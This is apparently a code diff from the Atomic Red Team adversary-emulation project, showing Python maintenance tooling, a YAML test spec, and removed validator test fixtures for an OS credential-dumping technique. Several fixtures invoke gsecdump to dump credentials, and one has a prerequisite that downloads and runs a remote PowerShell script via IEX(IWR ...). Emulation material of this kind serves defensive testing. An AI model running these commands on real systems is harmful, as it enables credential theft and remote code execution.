{"label": "1 or more tests", "color": "#ffffff"},
],
"techniques": techniques,
}
def _update_techniques_list(
self,
current_technique: dict,
current_technique_parent: dict,
techniques_list: List[dict],
atomic_yaml: dict,
comments: bool,
) -> None:
"""Update the techniques list with a new technique."""
tech_id = atomic_yaml.get("attack_technique", "")
if "." not in tech_id:
# This is a parent technique
tech_parent = next(
(
t
for t in techniques_list
if t["techniqueID"] == tech_id.split(".")[0]
),
None,
)
if tech_parent:
tech_parent["score"] += current_technique["score"]
if comments:
tech_parent["comment"] = current_technique.get("comment", "")
else:
if not comments:
current_technique.pop("comment", None)
techniques_list.append(current_technique)
else:
# This is a sub-technique
parent_id = tech_id.split(".")[0]
tech_parent = next(
(t for t in techniques_list if t["techniqueID"] == parent_id), None
)
if tech_parent:
tech_parent["score"] += current_technique["score"]
else:
current_technique_parent["score"] += current_technique["score"]
techniques_list.append(current_technique_parent)
if not comments:
current_technique.pop("comment", None)
techniques_list.append(current_technique)
def generate_navigator_layers(self, output_dir: Path) -> None:
"""Generate all ATT&CK Navigator layers."""
# Initialize technique lists for each platform
platforms_data = {
"all": [],
"windows": [],
"macos": [],
"linux": [],
"iaas": [],
"iaas_aws": [],
"iaas_azure": [],
"iaas_gcp": [],
"containers": [],
"google_workspace": [],
"azure_ad": [],
"office_365": [],
"esxi": [],
}
platform_patterns = {
"windows": re.compile(r"windows", re.I),
"macos": re.compile(r"macos", re.I),
"linux": re.compile(r"linux", re.I),
"iaas": re.compile(r"^iaas", re.I),
"iaas_aws": re.compile(r"^iaas:aws", re.I),
"iaas_azure": re.compile(r"^iaas:azure", re.I),
"iaas_gcp": re.compile(r"^iaas:gcp", re.I),
"containers": re.compile(r"^containers", re.I),
"google_workspace": re.compile(r"^google-workspace", re.I),
"azure_ad": re.compile(r"^azure-ad", re.I),
"office_365": re.compile(r"^office-365", re.I),
"esxi": re.compile(r"^esxi", re.I),
}
for atomic_yaml in self.atomic_red_team.atomic_tests:
tech_id = atomic_yaml.get("attack_technique", "")
base_technique = {
"techniqueID": tech_id,
"score": 0,
"enabled": True,
"comment": "\n",
"links": [
{
"label": "View Atomic",
"url": f"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/{tech_id}/{tech_id}.md",
}
],
}
base_parent = {
"techniqueID": tech_id.split(".")[0],
"score": 0,
"enabled": True,
"links": [
{
"label": "View Atomic",
"url": f"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/{tech_id.split('.')[0]}/{tech_id.split('.')[0]}.md",
}
],
}
# Create platform-specific technique copies
techniques = {
key: {**base_technique, "comment": "\n"} for key in platforms_data
}
technique_parents = {key: {**base_parent} for key in platforms_data}
has_tests = {key: False for key in platforms_data}
for atomic in atomic_yaml.get("atomic_tests", []):
techniques["all"]["score"] += 1
supported_platforms = atomic.get("supported_platforms", [])
for platform_key, pattern in platform_patterns.items():
if any(pattern.match(p) for p in supported_platforms):
has_tests[platform_key] = True
techniques[platform_key]["score"] += 1
techniques[platform_key]["comment"] += f"- {atomic['name']}\n"
# Update the all techniques list
self._update_techniques_list(
techniques["all"],
technique_parents["all"],
platforms_data["all"],
atomic_yaml,
False,
)
# Update platform-specific lists
for platform_key in platform_patterns:
if has_tests[platform_key]:
self._update_techniques_list(
techniques[platform_key],
technique_parents[platform_key],
platforms_data[platform_key],
atomic_yaml,
True,
)
# Write layers
layer_configs = [
("all", "art-navigator-layer.json", "Atomic Red Team"),
(
"windows",
"art-navigator-layer-windows.json",
"Atomic Red Team (Windows)",
),
("macos", "art-navigator-layer-macos.json", "Atomic Red Team (macOS)"),
("linux", "art-navigator-layer-linux.json", "Atomic Red Team (Linux)"),
("iaas", "art-navigator-layer-iaas.json", "Atomic Red Team (Iaas)"),
(
"iaas_aws",
"art-navigator-layer-iaas-aws.json",
"Atomic Red Team (Iaas:AWS)",
),
(
"iaas_azure",
"art-navigator-layer-iaas-azure.json",
"Atomic Red Team (Iaas:Azure)",
),
(
"iaas_gcp",
"art-navigator-layer-iaas-gcp.json",
"Atomic Red Team (Iaas:GCP)",
),
(
"containers",
"art-navigator-layer-containers.json",
"Atomic Red Team (Containers)",
),
(
"google_workspace",
"art-navigator-layer-google-workspace.json",
"Atomic Red Team (Google-Workspace)",
),
(
"azure_ad",
"art-navigator-layer-azure-ad.json",
"Atomic Red Team (Azure-AD)",
),
(
"office_365",
"art-navigator-layer-office-365.json",
"Atomic Red Team (Office-365)",
),
("esxi", "art-navigator-layer-esxi.json", "Atomic Red Team (ESXi)"),
]
for platform_key, filename, layer_name in layer_configs:
layer = self._get_layer(platforms_data[platform_key], layer_name)
output_path = output_dir / filename
# Use separators without spaces to match Ruby's compact JSON output
output_path.write_text(
json.dumps(layer, separators=(",", ":")), encoding="utf-8"
)
print(f"Generated Atomic Red Team ATT&CK Navigator Layer at {output_path}")
def generate_all_docs() -> Tuple[List[str], List[str]]:
"""Generate all Atomic Red Team documentation."""
return AtomicRedTeamDocs().generate_all_the_docs()
atomic_red_team/enterprise-attack.json
+112111 -876656
View File
File diff suppressed because one or more lines are too long
atomic_red_team/guid.py
-45
View File
@@ -1,45 +0,0 @@
import re
import uuid
from typing import List
from ruamel.yaml import YAML
from atomic_red_team.common import used_guids_file
yaml = YAML(typ="safe")
def get_unique_guid(guids: List[str]):
# This function should return a unique GUID that's not in the used_guids_file.
guid = str(uuid.uuid4())
if guid not in guids:
with open(used_guids_file, "a") as f: # append mode
f.write(f"{guid}\n")
return guid
else:
return get_unique_guid(guids)
def generate_guids_for_yaml(path, get_guid):
with open(path, "r") as file:
og_text = file.read()
# Add the "auto_generated_guid:" element after the "- name:" element if it isn't already there
text = re.sub(
r"(?i)(^([ \t]*-[ \t]*)name:.*$(?!\s*auto_generated_guid))",
lambda m: f"{m.group(1)}\n{m.group(2).replace('-', ' ')}auto_generated_guid:",
og_text,
flags=re.MULTILINE,
)
# Fill the "auto_generated_guid:" element in if it doesn't contain a guid
text = re.sub(
r"(?i)^([ \t]*auto_generated_guid:)(?!([ \t]*[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12})).*$",
lambda m: f"{m.group(1)} {get_guid()}",
text,
flags=re.MULTILINE,
)
if text != og_text:
with open(path, "wb") as file:
# using wb mode instead of w. If not, the end of line characters are auto-converted to OS specific ones.
file.write(text.encode())
atomic_red_team/labels.py
-163
View File
@@ -1,163 +0,0 @@
import fnmatch
import json
import os
import re
from dataclasses import dataclass
import requests
import yaml
from yaml.loader import SafeLoader
def get_technique_from_filename(filename):
"""Returns technique(Txxx.xxx) from the filename specified"""
return re.findall(r"T[.\d]{4,8}", filename)[0]
@dataclass
class ChangedAtomic:
"""Returns atomic technique with test number which can be later used to run atomics in CI/CD pipelines."""
technique: str
test_number: int
data: dict
class SafeLineLoader(SafeLoader):
def construct_mapping(self, node, deep=False):
"""Add line number to each block of the atomic test."""
mapping = super(SafeLineLoader, self).construct_mapping(node, deep=deep)
# Add 1 so line numbering starts at 1
mapping["__line__"] = node.start_mark.line + 1
return mapping
class GithubAPI:
labels = {
"windows": "windows",
"macos": "macOS",
"linux": "linux",
"azure-ad": "ADFS",
"containers": "containers",
"iaas:gcp": "cloud",
"iaas:aws": "cloud",
"iaas:azure": "cloud",
"office-365": "cloud",
"google-workspace": "cloud",
}
maintainers = {
"windows": ["clr2of8", "MHaggis", "cyberbuff"],
"linux": ["josehelps", "cyberbuff"],
"macos": ["josehelps", "cyberbuff"],
"containers": ["patel-bhavin"],
"iaas:gcp": ["patel-bhavin"],
"iaas:aws": ["patel-bhavin"],
"iaas:azure": ["patel-bhavin"],
"azure-ad": ["patel-bhavin"],
"google-workspace": ["patel-bhavin"],
"office-365": ["patel-bhavin"],
}
def __init__(self, token):
self.token = token
@property
def headers(self):
return {
"Authorization": f"Bearer {self.token}",
"X-GitHub-Api-Version": "2022-11-28",
"Accept": "application/vnd.github+json",
}
def get_atomic_with_lines(self, file_url: str):
"""Get Atomic Technique along with line number for each of the atomics."""
r = requests.get(file_url, headers=self.headers)
assert r.status_code == 200
return yaml.load(r.text, Loader=SafeLineLoader)
def get_files_for_pr(self, pr):
"""Get new and modified files in the `atomics` directory changed in a PR."""
response = requests.get(
f"https://api.github.com/repos/{os.getenv('GITHUB_REPOSITORY')}/pulls/{pr}/files",
headers=self.headers,
timeout=15,
)
assert response.status_code == 200
files = response.json()
return filter(
lambda x: x["status"] in ["added", "modified"]
and fnmatch.fnmatch(x["filename"], "atomics/T*/T*.yaml"),
files,
)
def get_tests_changed(self, pr: str):
"""Get all the tests changed in a PR"""
tests = []
start = 0
files = self.get_files_for_pr(pr)
for file in files:
data = self.get_atomic_with_lines(file["raw_url"])
technique = get_technique_from_filename(file["filename"])
if file["status"] == "added":
# New file; run the entire technique; Invoke-AtomicTest Txxxx
tests += [
ChangedAtomic(technique=technique, test_number=index + 1, data=t)
for index, t in enumerate(data["atomic_tests"])
]
else:
changed_lines = []
count = 0
for line in file["patch"].split("\n"):
if line.startswith("@@"):
x, y = re.findall(r"\d{1,3},\d{1,3}", line)
start = int(x.split(",")[0])
count = -1
elif line.startswith("+"): # only take count of added lines
changed_lines.append(start + count)
elif line.startswith("-"):
count -= 1
count += 1
atomics = data["atomic_tests"]
for index, t in enumerate(atomics):
curr_atomic_start = atomics[index]["__line__"]
if index + 1 < len(atomics):
curr_atomic_end = atomics[index + 1]["__line__"]
else:
curr_atomic_end = start + 60
changes_in_current_atomic = [
i
for i in changed_lines
if i > curr_atomic_start and i < curr_atomic_end
]
if len(changes_in_current_atomic) > 0:
tests.append(
ChangedAtomic(
technique=technique, test_number=index + 1, data=t
)
)
return tests
def save_labels_and_maintainers(self, pr):
"""Saves labels and maintainers into `pr/labels.json` which would be later used by a workflow run."""
tests = self.get_tests_changed(pr)
platforms = set()
for t in tests:
platforms.update(t.data["supported_platforms"])
labels = []
maintainers = []
for p in platforms:
if p in self.labels:
labels.append(self.labels[p])
if p in self.maintainers:
maintainers += self.maintainers[p]
os.mkdir("pr")
with open("pr/changedfiles.json", "w") as f:
x = [{"name": t.technique, "test_number": t.test_number} for t in tests]
f.write(json.dumps(x))
with open("pr/labels.json", "w") as f:
j = {"pr": pr, "labels": labels, "maintainers": maintainers}
f.write(json.dumps(j))
atomic_red_team/models.py
-280
View File
@@ -1,280 +0,0 @@
import re
from functools import reduce
from typing import Dict, List, Literal, Optional, Union
from uuid import UUID
from pydantic import (
AnyUrl,
BaseModel,
ConfigDict,
Field,
IPvAnyAddress,
StrictFloat,
StringConstraints,
conlist,
constr,
field_serializer,
field_validator,
model_validator,
)
from pydantic_core import PydanticCustomError
from pydantic_core.core_schema import ValidationInfo
from typing_extensions import Annotated, TypedDict
InputArgType = Literal["url", "string", "float", "integer", "path"]
Platform = Literal[
"windows",
"macos",
"linux",
"office-365",
"azure-ad",
"google-workspace",
"saas",
"iaas",
"containers",
"iaas:gcp",
"iaas:azure",
"iaas:aws",
"esxi",
]
ExecutorType = Literal["manual", "powershell", "sh", "bash", "command_prompt"]
DomainName = Annotated[
str,
StringConstraints(
pattern=r"^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z0-9][a-z0-9-]{0,61}[a-z0-9]$"
),
]
AttackTechniqueID = Annotated[
str, StringConstraints(pattern=r"T\d{4}(?:\.\d{3})?", min_length=5)
]
def extract_mustached_keys(commands: List[Optional[str]]) -> List[str]:
result = []
for command in commands:
if command:
matches = re.finditer(r"#{(.*?)}", command, re.MULTILINE)
keys = [list(i.groups()) for i in matches]
keys = list(reduce(lambda x, y: x + y, keys, []))
result.extend(keys)
return list(set(result))
def get_supported_platform(platform: Platform):
platforms = {
"macos": "macOS",
"office-365": "Office 365",
"windows": "Windows",
"linux": "Linux",
"azure-ad": "Azure AD",
"iaas": "IaaS",
"saas": "SaaS",
"iaas:aws": "AWS",
"iaas:azure": "Azure",
"iaas:gcp": "GCP",
"google-workspace": "Google Workspace",
"containers": "Containers",
"esxi": "ESXi",
}
return platforms[platform]
def get_language(executor: ExecutorType):
if executor == "command_prompt":
return "cmd"
elif executor == "manual":
return ""
return executor
class BaseArgument(TypedDict):
description: str
class UrlArg(BaseArgument):
default: Optional[DomainName | AnyUrl | IPvAnyAddress]
type: Literal["url", "Url"]
@field_serializer("default")
def serialize_url(self, value):
return str(value)
class StringArg(BaseArgument):
default: Optional[str]
type: Literal["string", "path", "String", "Path"]
class IntArg(BaseArgument):
default: Optional[int]
type: Literal["integer", "Integer"]
class FloatArg(BaseArgument):
default: Optional[StrictFloat]
type: Literal["float", "Float"]
Argument = Annotated[
Union[FloatArg, IntArg, UrlArg, StringArg], Field(discriminator="type")
]
class Executor(BaseModel):
name: ExecutorType
elevation_required: bool = False
class ManualExecutor(Executor):
name: Literal["manual"]
steps: str = Field(..., min_length=10)
class CommandExecutor(Executor):
name: Literal["powershell", "sh", "bash", "command_prompt"]
command: constr(min_length=1)
cleanup_command: Optional[constr(min_length=1)] = None
@field_validator("cleanup_command", mode="before")
@classmethod
def validate_cleanup_command(cls, v):
"""Reject empty cleanup_command strings - treat them as None or error."""
if v is not None and isinstance(v, str) and v.strip() == "":
raise PydanticCustomError(
"empty_cleanup_command",
"'cleanup_command' shouldn't be empty. Provide a valid command or remove the key from YAML",
{"loc": ["executor", "cleanup_command"], "input": v},
)
return v
class Dependency(BaseModel):
description: constr(min_length=1)
prereq_command: constr(min_length=1)
get_prereq_command: Optional[str]
class Atomic(BaseModel):
model_config = ConfigDict(
validate_default=True, extra="forbid", validate_assignment=True
)
test_number: Optional[str] = None
name: constr(min_length=1)
description: constr(min_length=1)
supported_platforms: conlist(Platform, min_length=1)
executor: Union[ManualExecutor, CommandExecutor] = Field(..., discriminator="name")
dependencies: Optional[List[Dependency]] = []
input_arguments: Dict[constr(min_length=2, pattern=r"^[\w_-]+$"), Argument] = {}
dependency_executor_name: Optional[ExecutorType] = None
auto_generated_guid: Optional[UUID] = None
@classmethod
def extract_mustached_keys(cls, value: dict) -> List[str]:
commands = []
executor = value.get("executor")
if isinstance(executor, CommandExecutor):
commands = [executor.command, executor.cleanup_command]
if isinstance(executor, ManualExecutor):
commands = [executor.steps]
for d in value.get("dependencies") or []:
commands.extend([d.get_prereq_command, d.prereq_command])
return extract_mustached_keys(commands)
@field_validator("dependency_executor_name", mode="before") # noqa
@classmethod
def validate_dep_executor(cls, v, info: ValidationInfo):
if v is not None and info.data.get("dependencies") == []:
raise PydanticCustomError(
"invalid_dependency_executor_name",
"'dependency_executor_name' is not needed if there are no dependencies. Remove the key from YAML",
{"loc": ["dependency_executor_name"], "input": None},
)
return v
@model_validator(mode="after")
def validate_elevation_required(self):
if (
("linux" in self.supported_platforms or "macos" in self.supported_platforms)
and not self.executor.elevation_required
and isinstance(self.executor, CommandExecutor)
):
commands = [self.executor.command]
if self.executor.cleanup_command:
commands.append(self.executor.cleanup_command)
if any(["sudo" in cmd for cmd in commands]):
raise PydanticCustomError(
"elevation_required_but_not_provided",
"'elevation_required' shouldn't be empty/false. Since `sudo` is used, set `elevation_required` to true`",
{
"loc": ["executor", "elevation_required"],
"input": self.executor.elevation_required,
},
)
return self
@field_validator("input_arguments", mode="before") # noqa
@classmethod
def validate(cls, v, info: ValidationInfo):
if v is None:
raise PydanticCustomError(
"empty_input_arguments",
"'input_arguments' shouldn't be empty. Provide a valid value or remove the key from YAML",
{"loc": ["input_arguments"], "input": None},
)
atomic = info.data
keys = cls.extract_mustached_keys(atomic)
for key, _value in v.items():
if key not in keys:
raise PydanticCustomError(
"unused_input_argument",
f"'{key}' is not used in any of the commands",
{"loc": ["input_arguments", key], "input": key},
)
else:
keys.remove(key)
if len(keys) > 0:
for x in keys:
raise PydanticCustomError(
"missing_input_argument",
f"{x} is not defined in input_arguments",
{"loc": ["input_arguments"]},
)
return v
class Technique(BaseModel):
attack_technique: AttackTechniqueID
display_name: str = Field(..., min_length=5)
atomic_tests: List[Atomic] = Field(min_length=1)
@model_validator(mode="before")
@classmethod
def validate_dependency_executor_names(cls, data):
"""Check if dependency_executor_name keys are present with empty/None values in atomic tests"""
if isinstance(data, dict) and "atomic_tests" in data:
atomic_tests = data.get("atomic_tests", [])
for i, test in enumerate(atomic_tests):
if isinstance(test, dict) and "dependency_executor_name" in test:
value = test.get("dependency_executor_name")
# If the key exists but value is None or empty string, that's an error
if value is None or value == "":
raise PydanticCustomError(
"empty_dependency_executor_name",
"'dependency_executor_name' shouldn't be empty. Provide a valid value ['manual','powershell', 'sh', "
"'bash', 'command_prompt'] or remove the key from YAML",
{
"loc": ["atomic_tests", i, "dependency_executor_name"],
"input": value,
},
)
return data
def model_post_init(self, __context) -> None:
for index in range(len(self.atomic_tests)):
test_number = f"{self.attack_technique}-{index + 1}"
self.atomic_tests[index].test_number = test_number
atomic_red_team/runner.py
-175
View File
@@ -1,175 +0,0 @@
import glob
import json
import os
import sys
import urllib.parse
from collections import defaultdict
from functools import partial
from pathlib import Path
from typing import Annotated, Optional
import typer
from pydantic import ValidationError
from atomic_red_team.common import atomics_path, used_guids_file
from atomic_red_team.guid import (
generate_guids_for_yaml,
get_unique_guid,
)
from atomic_red_team.labels import GithubAPI
from atomic_red_team.models import Technique
from atomic_red_team.utils import ATOMIC_RED_TEAM
from atomic_red_team.validator import Validator, format_validation_error, yaml
app = typer.Typer(help="Atomic Red Team Maintenance tool CLI helper")
@app.command()
def generate_guids():
"""Generates missing GUIDs for the atomic files"""
with open(used_guids_file, "r") as file:
used_guids = file.readlines()
for file in glob.glob(f"{atomics_path}/T*/T*.yaml"):
generate_guids_for_yaml(file, partial(get_unique_guid, guids=used_guids))
@app.command()
def generate_schemas():
"""Generates JSON and YAML schemas for techniques"""
schema = Technique.model_json_schema() # (1)!
with open("schema.yaml", "w") as f:
yaml.default_flow_style = False
yaml.dump(schema, f)
with open("schema.json", "w") as f:
f.write(json.dumps(schema, indent=2))
@app.command()
def generate_counter():
"""Generate atomic tests count svg"""
test_count = 0
for file in glob.glob(f"{atomics_path}/T*/T*.yaml"):
with open(file, "r") as f:
yaml_data = yaml.load(f)
if yaml_data is not None and "atomic_tests" in yaml_data:
test_count += len(yaml_data["atomic_tests"])
# Generate the shields.io badge URL
params = {"label": "Atomics", "message": str(test_count), "style": "flat"}
url = "https://img.shields.io/badge/{}-{}-{}.svg".format(
urllib.parse.quote_plus(params["label"]),
urllib.parse.quote_plus(params["message"]),
urllib.parse.quote_plus(params["style"]),
)
# Save shields URL in GitHub Output to be used in the next step.
with open(os.environ["GITHUB_OUTPUT"], "a") as fh:
print(f"result={url}", file=fh)
@app.command()
def generate_labels(
pull_request: Annotated[str, typer.Option("--pr")],
token: Annotated[str, typer.Option("--token")],
):
"""Generate labels for a pull request."""
api = GithubAPI(token)
api.save_labels_and_maintainers(pull_request)
@app.command()
def validate():
"""
Validate all the atomic techniques in a directory.
"""
validator = Validator()
errors = defaultdict(list)
for folder in glob.glob(f"{atomics_path}/T*"):
for item in os.scandir(folder):
try:
validator.validate(item)
except ValidationError as error:
errors[item.path].append(error)
if len(errors) == 0:
print("Validation successful")
else:
print("Validation failed")
for i, errors in errors.items():
print(f"Error occurred with {i.replace(f'{atomics_path}/', '')}.")
print("Each of the following are why it failed:")
for error in errors:
if isinstance(error, ValidationError):
for k, v in format_validation_error(error).items():
print(f"\n\tInvalid {'.'.join(map(str, v))}: {k}\n")
else:
print(f"\n\t{error}\n")
sys.exit(1)
@app.command()
def generate_docs(
technique_id: Annotated[
Optional[str],
typer.Option(
"--technique", "-t", help="Specific technique ID to generate docs for"
),
] = None,
output_dir: Annotated[
Optional[str],
typer.Option("--output", "-o", help="Output directory for documentation"),
] = None,
full: Annotated[
bool,
typer.Option("--full", "-f", help="Generate all docs including indexes, matrices, and navigator layers"),
] = False,
):
"""Generate Markdown documentation for atomic tests.
Use --full to generate all documentation including:
- Individual technique markdown files
- ATT&CK matrices (markdown)
- Platform-specific indexes (markdown, CSV, YAML)
- ATT&CK Navigator layers (JSON)
"""
if full:
# Generate all documentation including indexes
from atomic_red_team.doc_generator import generate_all_docs
oks, fails = generate_all_docs()
if fails:
sys.exit(len(fails))
return
if output_dir is None:
output_dir = atomics_path
if technique_id:
# Generate docs for a specific technique
technique_id = technique_id.upper()
output_path = Path(output_dir) / technique_id / f"{technique_id}.md"
try:
ATOMIC_RED_TEAM.generate_technique_docs(technique_id, str(output_path))
print(f"Generated documentation for {technique_id} at {output_path}")
except ValueError as e:
print(f"Error: {e}")
sys.exit(1)
else:
# Generate docs for all techniques
count = 0
for atomic_yaml in ATOMIC_RED_TEAM.atomic_tests:
tech_id = atomic_yaml.get("attack_technique", "").upper()
if tech_id:
output_path = Path(output_dir) / tech_id / f"{tech_id}.md"
try:
ATOMIC_RED_TEAM.generate_technique_docs(tech_id, str(output_path))
count += 1
except Exception as e:
print(f"Error generating docs for {tech_id}: {e}")
print(f"Generated documentation for {count} techniques")
if __name__ == "__main__":
app()
atomic_red_team/spec.yaml
+164
View File
@@ -0,0 +1,164 @@
#
# This spec describes the format of Atomic Red Team atomic tests that are defined in YAML format.
#
# The directory structure is:
# - These tests reside in the `atomics` directory
# - One directory per ATT&CK technique, named "T1234"
# - All the atomic tests for a technique in a file called "T1234.yaml" inside that directory
# - Any payloads, supporting materials, etc for the atomic tests also live in that directory
#
# For example:
#
# atomic_red_team/
# atomic_red_team/atomics
# atomic_red_team/atomics/T1234
# atomic_red_team/atomics/T1234/T1234.yaml <-- this is where all the atomic tests live
# atomic_red_team/atomics/T1234/payload1.sct <-- a payload file needed by one of the T1234 atomics
# atomic_red_team/atomics/T1234/payload2.dll <-- another payload file needed by one of the T1234 atomics
#
# In general, a set of atomic tests for a technique should never depend on payloads
# or supporting files from other atomic directories. We want to keep things nice and close.
# Use git symlinks if you really need to share files between techniques.
#
# To validate your atomics, run `bin/validate_atomics.rb`
---
attack_technique: TXXXX # (with a capital T, Example: 'T1123')
display_name: Name of the technique as defined by ATT&CK. # Example: 'Audio Capture'
# `atomic_tests` is an array of distinct test cases inside this technique. A test case should
# include ALL of the information needed to run that test (ie, this is the "atomic" - you don't
# distribute steps across different atomics)
# Each of these tests is a YAML array element (starts with a `-`).
atomic_tests:
#
# This is the first atomic test
#
- name: Short name of the test that titles how it tests the technique. # Example: "SourceRecorder via cmd.exe"
description: |
Long form description of the test. Markdown is supported so you can **bold** items, create
- one list
- two list
- red list
- [blue list](https://google.com)
# supported platforms is an array of the OS/platforms this atomic test can be run upon. Values include:
# - windows
# - macos
# - centos
# - ubuntu
# - linux
supported_platforms:
- windows
# inputs to the atomic test that are required to run the test (think of these like function arguments).
# This is a hash where the key is the input name, value is a hash defining the input argument.
input_arguments:
# this is the first input argument, called "output_file"
output_file:
# Short description of the input argument
description: xxxxx
# data type of the input. Possible values could include:
# - Path (a file path)
# - Url (a URL)
# - String
# - Integer
# - Float
# - really anything else you'd like, but add it to this list
type: Path
# default value for this argument that will be used if one is not specifid
default: test.wma
# this is a example of a second argument
malware_payload_url:
description: xxxxx
type: Url
default: 0000:00:30
# a list of executors that can execute this atomic test. There are almost always going to be one of these
# per test, but there are cases where you may have multiple - for example, separate executors for `sh`
# and `bash` when working on linux OSes.
executors:
# the name of the executor describes the framework or application in which the test should be executed.
#
# Each of these executors will have options that the executor needs to run. Possible executors we've imagined
# at this time and their required options include:
#
# - `command_prompt` : The Windows Command Prompt, aka cmd.exe
# Requires the "command" option that is a multi-line script that will be preprocessed and
# then executed by cmd.exe
#
# Example:
# - name: command_prompt
# command: |
# echo "attack starting"
# echo "running command 1: this is the value of the FOOBAR input_argument: #{FOOBAR}"
#
# - `powershell` : Powershell
# Requires the "`command`" option that is a multi-line script that will be preprocessed and
# then executed by cmd.exe
#
# Example:
# - name: powershell
# command: |
# Write-Debug "attack starting"
# Write-Debug "running command 1: this is the value of the FOOBAR input_argument: #{FOOBAR}"
#
# - `sh` : Linux's bourne shell
# Requires the "`command`" option that is a multi-line script that will be preprocessed and
# then executed by cmd.exe
#
# Example:
# - name: sh
# command: |
# echo "attack starting"
# echo "running command 1: this is the value of the FOOBAR input_argument: #{FOOBAR}"
#
# - `bash` : Linux's bourne again shell
# Requires the "`command`" option that is a multi-line script that will be preprocessed and
# then executed by cmd.exe
#
# Example:
# - name: bash
# command: |
# echo "attack starting"
# echo "running command 1: this is the value of the FOOBAR input_argument: #{FOOBAR}"
#
# - `manual` : a list of manual steps to run. This is most often used when GUI steps are involved that
# cannot be automated.
#
# Requires the `steps` option that tells the user what to do to invoke the test. This is a
# multi-line list of instructions (also preprocessed)
#
# Example:
# - name: manual
# steps: |
# 1. Navigate to [chrome://extensions](chrome://extensions) and
# tick 'Developer Mode'.
#
# 2. Click 'Load unpacked extension...' and navigate to
# [Browser_Extension](../T1176/)
#
# 3. Click the '#{FOOBAR}' button - you can interpolate here too!
#
- name: command_prompt
command: |
SoundRecorder /FILE #{output_file} /DURATION #{duration_hms}
#
# This is the second atomic test
#
- name: Echo to the screen
description: |
blah blah blah
supported_platforms:
- macos
- centos
- ubuntu
# in this example we have no input arguments
input_arguments:
executors:
- name: bash
command: echo "Hello world!"
atomic_red_team/test_data/elevation_required_but_not_provided.yaml
-13
View File
@@ -1,13 +0,0 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Root login
auto_generated_guid:
description: |
Login as root.
supported_platforms:
- linux
executor:
command: |
sudo -i
name: bash
atomic_red_team/test_data/empty_dependency_executor_name.yaml
-20
View File
@@ -1,20 +0,0 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
auto_generated_guid:
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
elevation_required: true
dependency_executor_name:
atomic_red_team/test_data/empty_input_arguments.yaml
-15
View File
@@ -1,15 +0,0 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
auto_generated_guid:
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
input_arguments:
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
elevation_required: true
atomic_red_team/test_data/float_type.yaml
-18
View File
@@ -1,18 +0,0 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: float
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
atomic_red_team/test_data/int_parsing.yaml
-18
View File
@@ -1,18 +0,0 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: integer
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
atomic_red_team/test_data/invalid_dependency_executor_name.yaml
-20
View File
@@ -1,20 +0,0 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
auto_generated_guid:
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
elevation_required: true
dependency_executor_name: "bash"
atomic_red_team/test_data/invalid_filename.yml
-39
View File
@@ -1,39 +0,0 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
gsecdump_bin_hash:
description: File hash of the Gsecdump binary file
type: string
default: 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC
gsecdump_url:
description: Path to download Gsecdump binary file
type: url
default: https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe
dependency_executor_name: powershell
dependencies:
- description: |
Gsecdump must exist on disk at specified location (#{gsecdump_exe})
prereq_command: |
if (Test-Path "#{gsecdump_exe}") {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe"
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}){
Move-Item $binpath "#{gsecdump_exe}"
}
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
elevation_required: true
atomic_red_team/test_data/missing_input_argument.yaml
-13
View File
@@ -1,13 +0,0 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
